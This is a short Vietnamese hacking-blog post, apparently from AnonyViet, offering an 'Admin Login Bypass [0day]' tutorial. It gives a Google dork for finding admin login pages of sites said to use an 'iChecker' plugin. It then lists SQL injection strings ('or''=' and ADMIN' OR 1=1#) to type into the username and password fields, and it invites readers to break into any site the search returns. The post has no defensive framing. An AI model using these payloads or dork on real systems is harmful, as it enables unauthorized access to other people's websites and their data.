—————————————————————————————————
Tôi tìm thấy một trang web và tôi thấy rằng trang quản trị của trang web đó có thể được truy cập chỉ đơn giản với một phương pháp bỏ qua xác thực.
Sau đó, tôi tìm kiếm các trang web khác với Dork trên để quét chúng, và tôi tìm thấy nhiều trang web dễ bị lỗi tương tự!
Vì vậy, tôi quyết định chia sẻ điều này với các bạn!
(Killer040)
Hướng dẫn Admin Login Bypass
{-} Vulnerable Versions => Hầu hết bị dính lỗi ở CMS của Plugin ‘iChecker’.
Tiến hành:
Bước 1: Tìm Link Admin
Sử dụng 1 trong 2 link này để tìm Web Admin
Hoặc vào google gõ lệnh:
"Sign in to start your session" inurl:admin/login.php
hoặc
"Sign in to start your session"
Bước 2:
Truy cập vào trang web bất kỳ mà google tìm thấy, đăng nhập vào trang web với user/admin dưới đây (có một số trường hợp password sẽ để trống)
User: 'or''=' Pass: 'or''='
hoặc
User: ADMIN' OR 1=1# Pass: ADMIN' OR 1=1#
Kết quả:
Cảm ơn các bạn đã theo dõi TOP Thủ Thuật trên đây là những chia sẻ của chúng tôi về Admin Login Bypass [0day] – AnonyViet. Hy vọng bài viết tại chuyên mục Security sẽ giúp ích được cho bạn. Trân trọng !!!